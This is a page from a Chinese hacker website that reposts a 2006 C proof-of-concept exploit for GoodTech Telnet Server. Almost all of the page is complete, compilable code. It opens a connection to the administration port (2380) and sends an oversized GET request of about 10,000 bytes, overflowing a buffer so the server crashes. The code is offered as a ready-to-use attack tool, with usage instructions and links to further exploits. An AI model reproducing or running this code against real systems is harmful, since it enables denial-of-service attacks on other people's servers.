GoodTech Telnet Server 5.0.7 Buffer Overflow Crash Exploit：Yes黑客联盟网站

您现在的位置： Yes!黑客联盟 >> 技术 >> 黑客技术 >> Exploite >> 正文

专题栏目

推荐文章

GoodTech Telnet Server 5.0.7 Buffer Overflow Crash Exploit

热

GoodTech Telnet Server 5.0.7 Buffer Overflow Crash Exploit

作者：YesHack.… 文章来源：YesHack.Com 更新时间：2006-4-18 8:28:23 【字体：小大】

/******************************************************************************************

       GoodTech Telnet Server Buffer Overflow Crash POC
       created by Komrade
       e-mail:       unsecure(at)altervista(dot)org
       web:       [url]http://unsecure.altervista.org[/url]

Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
on a Windows XP Professional sp2 operating system.

       This exploit connects to the Administration server of GoodTech Telnet Server
       (default port 2380) and sends a very long string (10040 bytes).
       After the exploit is sent the Telnet Server will crash, trying to access
       to a bad memory address: 0xDEADCODE.

Usage: gtscrash.exe "IP address"

Options:
"IP address" The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

       SOCKET sock;
       struct sockaddr_in sock_addr;
       WSADATA data;
       WORD p;
       p=MAKEWORD(2,0);
       WSAStartup(p,&data);
       int i, n, err;
       unsigned char *mex;
       char risp[4096];

       printf("------------------------------------------------------------------------------\r\n");
       printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
       printf("\t\t\tcreated by Komrade\r\n\r\n");

       printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
       printf("\t\tweb: [url]http://unsecure.altervista.org[/url]\r\n");
       printf("------------------------------------------------------------------------------\r\n\r\n");

       if (argc < 2){
              printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
              printf("Options:\r\n");
              printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
              exit(0);
       }

mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

       sock = socket(AF_INET, SOCK_STREAM, 0);
       sock_addr.sin_family=PF_INET;
       sock_addr.sin_port=htons(2380); /* Administration web server port */
       sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

       err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
       if(err<0){
              printf("Unable to connect() to %s\n", argv[1]);
              exit(-1);
       }

strcpy (mex, "GET /");

       for(i = strlen(mex); i < 10032; i++)
              mex[i]= 'a';
       mex[i]=0;

strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");

printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);

       n=recv(sock, risp, sizeof(risp), 0);
       if (n < 0)
              printf("GoodTech Telnet Server succesfully crashed!!\n");
       else{
              risp[n]=0;
              printf("%s\n", risp);
       }

       closesocket(sock);
       WSACleanup();
       return 0;
}

友情提示：如果您对本文章的内容存在疑问请到点此进入论坛进行讨论

文章录入：YesHack.Com 责任编辑：YesHack.Com

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

上一篇文章： phpBB User id Auth. Bypass and admin_styles Code Injection Exploit

下一篇文章： Chat Anywhere Local Passwords Disclosure Proof of Concept Exploit